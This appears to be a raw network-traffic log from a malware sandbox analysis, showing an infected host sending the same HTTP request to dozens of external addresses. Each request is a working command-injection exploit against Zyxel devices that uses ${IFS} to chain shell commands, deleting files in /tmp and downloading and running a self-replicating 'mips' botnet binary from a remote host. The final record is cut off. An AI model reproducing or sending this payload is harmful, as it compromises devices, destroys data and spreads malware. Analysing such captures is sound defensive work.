                              Session IDSource IPSource PortDestination IPDestination Port
                              3780192.168.2.1349268166.242.246.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754861116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3781192.168.2.134035674.67.27.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754898071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3782192.168.2.1347356211.68.109.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754926920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3783192.168.2.1346524210.10.149.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754968882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3784192.168.2.135836069.78.135.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.755018950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3785192.168.2.134663683.75.83.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.755075932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3786192.168.2.1333004156.205.94.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.755085945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3787192.168.2.134362872.51.102.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.755325079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3788192.168.2.1341476211.13.84.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.755386114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3789192.168.2.135644446.9.139.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786494970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3790192.168.2.1333006190.227.82.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786539078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3791192.168.2.135456438.214.69.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786576033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3792192.168.2.1334870219.3.144.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786628962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3793192.168.2.133947476.235.167.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786659002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3794192.168.2.1335064158.140.97.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786725998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3795192.168.2.1357474186.116.199.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786777973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3796192.168.2.134482683.66.36.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786827087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3797192.168.2.133526687.227.97.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786861897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3798192.168.2.1332834217.230.49.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786932945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3799192.168.2.13486565.58.30.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786930084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3800192.168.2.1356116189.207.148.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786958933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3801192.168.2.134212634.151.90.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.786998987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3802192.168.2.136058453.61.0.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787033081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3803192.168.2.135254678.163.202.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787117958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3804192.168.2.1334148137.0.243.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787137032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3805192.168.2.135780490.49.234.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787205935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3806192.168.2.1338800189.198.32.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787246943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3807192.168.2.1336004168.210.20.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787298918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3808192.168.2.135314263.114.82.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787343025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3809192.168.2.1347146217.144.62.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787395000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3810192.168.2.1333768109.141.35.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787448883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3811192.168.2.134270061.42.229.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787499905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3812192.168.2.134159484.101.216.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787537098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3813192.168.2.1346632181.37.117.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787581921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3814192.168.2.1332882151.178.22.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787622929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3815192.168.2.1333746164.120.218.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787673950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3816192.168.2.1347728161.165.75.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787714005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3817192.168.2.134292241.157.65.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787775040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3818192.168.2.1342170161.126.241.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787827969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3819192.168.2.1341232149.190.61.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787861109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3820192.168.2.133602682.43.143.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787895918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3821192.168.2.1358574208.255.16.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787920952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3822192.168.2.1351666200.60.80.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.787975073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3823192.168.2.135016478.177.202.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.788024902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3824192.168.2.134591649.185.109.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.788062096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3825192.168.2.1353516185.19.23.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.788110971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3826192.168.2.134989248.139.130.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.788145065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3827192.168.2.134022476.171.49.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.788176060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3828192.168.2.1350650175.211.142.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:22.788233995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3829192.168.2.1341732168.25.89.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:23.793651104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3830192.168.2.135254877.118.244.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:23.793693066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3831192.168.2.1357194194.122.110.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:23.793730974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3832192.168.2.135189658.199.111.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:23.793786049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3833192.168.2.1341294109.194.141.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:23.793817043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3834192.168.2.135325897.170.250.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800558090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3835192.168.2.136044665.97.40.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800594091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3836192.168.2.1334496208.33.233.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800626040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3837192.168.2.135187661.248.197.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800668955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3838192.168.2.1336626113.42.65.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800708055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3839192.168.2.1358176206.8.194.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800729990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3840192.168.2.1342284120.66.79.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800746918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3841192.168.2.1347474138.31.72.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800770998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3842192.168.2.135612479.37.113.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800805092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3843192.168.2.1356042206.25.255.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800831079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3844192.168.2.1351774161.19.167.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800868034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3845192.168.2.13566722.16.235.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800909996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3846192.168.2.133295835.98.10.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800941944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3847192.168.2.1360086197.184.137.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.800981998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3848192.168.2.13602369.34.52.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801014900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3849192.168.2.135043641.38.73.198443
                              TimestampBytes transferredDirectionData
